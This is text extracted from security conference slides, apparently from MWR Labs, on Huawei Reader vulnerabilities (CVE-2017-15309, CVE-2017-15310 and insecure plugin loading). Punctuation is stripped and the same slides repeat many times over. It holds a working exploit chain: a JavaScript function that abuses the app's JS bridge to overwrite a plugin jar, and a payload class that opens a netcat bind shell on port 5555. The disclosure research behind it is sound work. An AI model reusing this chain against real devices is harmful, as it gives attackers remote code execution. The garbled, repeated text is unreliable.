ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
PUBLIC